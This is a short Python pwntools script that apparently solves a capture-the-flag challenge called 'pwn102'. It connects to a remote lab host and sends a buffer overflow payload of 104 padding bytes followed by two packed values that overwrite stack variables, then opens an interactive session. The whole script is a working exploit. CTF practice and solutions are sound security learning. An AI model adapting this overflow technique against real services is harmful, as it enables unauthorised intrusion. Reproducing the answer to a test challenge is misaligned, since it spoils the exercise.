#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn102", checksec=False)
# r = process()
r = remote("10.10.110.117", 9002)

# funcs
s = lambda a: r.sendlineafter(b"? ", a)

# buf
buf = b"A"*104
buf += p32(0xc0d3)
buf += p32(0xc0ff33)
s(buf)

r.interactive()